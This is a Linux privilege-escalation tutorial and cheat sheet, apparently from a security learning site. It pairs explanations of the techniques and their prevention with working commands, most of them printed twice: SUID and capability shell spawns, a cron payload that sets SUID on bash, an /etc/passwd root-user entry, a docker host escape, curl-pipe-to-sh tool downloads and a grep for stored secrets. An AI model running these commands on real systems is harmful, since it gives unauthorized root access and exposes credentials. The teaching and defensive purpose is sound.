Linux Privilege Escalation Cheat Sheet: Techniques and Prevention

Introduction

Linux privilege escalation is a critical security concern that involves exploiting vulnerabilities to gain unauthorized access to system resources. This technique is commonly used by attackers to elevate their privileges from a limited user account to the root user, allowing them full control over the system. The root user has unrestricted access, enabling them to modify system configurations, install software, manage user accounts, and execute commands with elevated privileges. Privilege escalation can occur through various means, including misconfigurations in sudo permissions or setuid/setgid binaries. Attackers often exploit these weaknesses after gaining initial access to a system through vulnerabilities in software or kernel components. Understanding these techniques is essential for both ethical hackers conducting penetration tests and system administrators aiming to secure their systems against potential threats.

In this article, we will delve into the concept of Linux privilege escalation, explore common techniques used by attackers for vertical and horizontal privilege escalation, discuss prevention strategies such as regular updates and security audits, and provide practical examples of how these methods are employed.

Learning Objectives

• Understand what Linux privilege escalation is.
• Learn common techniques used for privilege escalation.
• Identify methods for preventing such escalations.
• Explore real-world examples of attacks using these techniques.

What is Linux Privilege Escalation?

Linux privilege escalation refers to the process of gaining elevated access rights on a Linux system. Typically, this involves using legitimate mechanisms like sudo or setuid/setgid permissions for authorized users. However, when exploited by attackers, it becomes malicious as they seek unauthorized elevation from limited accounts to root-level access. Privilege escalation can occur in two forms: vertical and horizontal. Vertical escalation involves moving from a lower-privileged account to one with higher privileges, such as gaining root access. Horizontal escalation involves accessing resources reserved for other users at the same privilege level.

Common methods for vertical privilege escalation include exploiting software or kernel vulnerabilities, misconfiguring sudo permissions, and abusing setuid/setgid binaries. Understanding these techniques is crucial for securing systems against potential threats. To mitigate risks effectively requires implementing robust security measures such as regular updates and security hardening tools like SELinux or AppArmor. Educating users about secure practices also helps maintain a secure environment against malicious activities aimed at escalating privileges within Linux systems.

How Does Privilege Escalation Occur?

Privilege escalation occurs when attackers exploit existing vulnerabilities or misconfigurations within a system. Here are six common methods used for privilege escalation:

1. Kernel Exploits: Vulnerabilities in the Linux kernel can be exploited for local privilege escalation, allowing attackers to gain root access. These exploits often require specific conditions and may cause system instability, making them a last resort for attackers. Kernel exploits can be particularly dangerous as they provide direct access to system resources.
2. Sudo Misconfiguration: Incorrectly configured sudo permissions allow users to run commands as superusers without proper authorization. This can happen if the sudoers file is not properly set up, enabling unauthorized users to execute commands with elevated privileges. Sudo misconfigurations are common due to incorrect setup or oversight in managing user permissions.
3. Setuid/Setgid Binaries: Executables with setuid/setgid bits run with elevated privileges when executed by any user. Attackers often exploit these binaries by finding vulnerabilities within them or using them in unintended ways to spawn shells or execute malicious code. Proper management of these binaries is crucial to prevent unauthorized elevation of privileges.
4. Cron Jobs Abuse: Cron jobs that use wildcards (*) can be manipulated if writable directories are accessible. Attackers might create scripts that get executed by cron jobs running as root, thereby gaining elevated access. Regular monitoring of cron jobs and ensuring secure configurations is essential.
5. Capabilities Abuse: Misconfigured capabilities on executables grant unnecessary privileges, such as cap_setuid, which could potentially be used to escalate privileges by setting the user ID of the process to zero (root). Proper configuration and monitoring of capabilities help prevent such abuses.
6. Password Discovery and Reuse: Finding passwords stored insecurely on a system allows attackers to log into higher-privileged accounts directly or use them with sudo commands for escalated access. Ensuring strong password policies and secure storage practices helps mitigate this risk.

These methods highlight how critical it is for system administrators to regularly audit configurations, update software components, and implement robust security measures like SELinux or AppArmor to prevent such escalations from occurring successfully.

Linux Privilege Escalation Cheat Sheet

1. Enumeration:

Gather critical system, user, and service information first.

System Info:

uname -a                          # Kernel version
cat /etc/*-release                # OS/distro info
cat /proc/version                 # Kernel and compiler info
hostname                          # System name

uname -a                          # Kernel version
cat /etc/*-release                # OS/distro info
cat /proc/version                 # Kernel and compiler info
hostname                          # System name

User Info:

id                                # Current user privileges
whoami                            # Current username
sudo -l                           # Check sudo privileges (critical!)
cat /etc/passwd                   # List all users
echo $PATH                        # Check writable paths
env                               # Environment variables

id                                # Current user privileges
whoami                            # Current username
sudo -l                           # Check sudo privileges (critical!)
cat /etc/passwd                   # List all users
echo $PATH                        # Check writable paths
env                               # Environment variables

Files & Permissions:

find / -perm -4000 2>/dev/null             # SUID binaries
find / -perm -2000 2>/dev/null             # SGID binaries
find / -writable 2>/dev/null               # World-writable files
find / -type f -name ".*" -ls 2>/dev/null  # Hidden files

find / -perm -4000 2>/dev/null             # SUID binaries
find / -perm -2000 2>/dev/null             # SGID binaries
find / -writable 2>/dev/null               # World-writable files
find / -type f -name ".*" -ls 2>/dev/null  # Hidden files

Cron Jobs:

cat /etc/crontab                  # Scheduled tasks
ls -la /etc/cron*                 # Cron directories
ls -la /var/spool/cron            # User-specific cron jobs

cat /etc/crontab                  # Scheduled tasks
ls -la /etc/cron*                 # Cron directories
ls -la /var/spool/cron            # User-specific cron jobs

2. Common Exploitation Techniques:

SUID Binaries

• Find SUID files:

find / -perm -4000 -type f 2>/dev/null

find / -perm -4000 -type f 2>/dev/null

• Exploit common SUID binaries (e.g., find, vim, bash, nano):

# Example: Using find to spawn a shell
find . -exec /bin/sh \; -quit

# Example: Using find to spawn a shell
find . -exec /bin/sh \; -quit

Sudo Privileges

• If sudo -l reveals a vulnerable command:

# Run a command as root (e.g., if allowed to run /bin/bash)
sudo /bin/bash

# Run a command as root (e.g., if allowed to run /bin/bash)
sudo /bin/bash

Exploit via GTFO Bins (https://gtfobins.github.io/)

Cron Job Abuse

• Wildcard Injection: If a cron script uses wildcards (*):

echo 'chmod +s /bin/bash' > payload.sh
chmod +x payload.sh

echo 'chmod +s /bin/bash' > payload.sh
chmod +x payload.sh

• Path Hijacking: If a script uses relative paths:

export PATH=/tmp:$PATH   # Replace /tmp with a writable directory

export PATH=/tmp:$PATH   # Replace /tmp with a writable directory

Kernel Exploits

• Use tools like Linux Exploit Suggester or search Exploit-DB

searchsploit "Linux Kernel"

searchsploit "Linux Kernel"

Capabilities

• Check binaries with special privileges:

getcap -r / 2>/dev/null

getcap -r / 2>/dev/null

Example: if python has cap_setuid: 

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Writable /etc/passwd or /etc/shadow

• Add a root user:

# /etc/passwd entry (password hash for "password")
root2:$(openssl passwd -6 -salt salt password):0:0:root:/root:/bin/bash

# /etc/passwd entry (password hash for "password")
root2:$(openssl passwd -6 -salt salt password):0:0:root:/root:/bin/bash

Docker Abuse

• If part of the docker group:

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

3. Automated Tools:

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
curl -L https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh | sh

# Linux Exploit Suggester:
perl linux-exploit-suggester.pl

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
curl -L https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh | sh

# Linux Exploit Suggester:
perl linux-exploit-suggester.pl

4. Checklist for Quick Wins:

1. Check sudo -l for no-password commands.
2. Look for SUID/SGID binaries (e.g., find, vim).
3. Review cron jobs for wildcards or writable scripts.
4. Check /etc/passwd and /etc/shadow for writability.
5. Search for credentials in configs, backups, or history:

grep -RiE 'password|secret' /home /var/www /opt 2>/dev/null

grep -RiE 'password|secret' /home /var/www /opt 2>/dev/null

Conclusion

Linux privilege escalation poses significant risks if not properly managed, as it allows attackers to gain unauthorized access to system resources. However, understanding these techniques empowers administrators to implement robust security measures effectively. To mitigate these risks, keeping systems up-to-date with the latest security patches is crucial. Utilizing automated tools like LinPEAS or LinEnum helps identify potential vulnerabilities and misconfigurations that could be exploited for privilege escalation. Enforcing strict access controls through mechanisms like SELinux or AppArmor restricts unauthorized access and limits the damage potential in case of a breach. Implementing the principle of least privilege ensures that users and processes have only necessary permissions.

Regular monitoring and logging help detect suspicious activities related to privilege escalation attempts early on. By adopting these strategies, organizations can strengthen their defenses against Linux privilege escalation attacks and maintain a secure computing environment. Ultimately, proactive management combined with continuous learning about emerging threats is key to safeguarding Linux environments from escalating privileges attacks effectively.

You May Be Interested In:

• What is Linux?
• DC-1 Capture The Flag Vulnhub Walkthrough
• Basic Active Directory Enumeration: A Comprehensive Guide
• Cybersecurity Journey: A Beginner’s Roadmap with TryHackMe
• Linux Network Basics: An Introduction to Network Management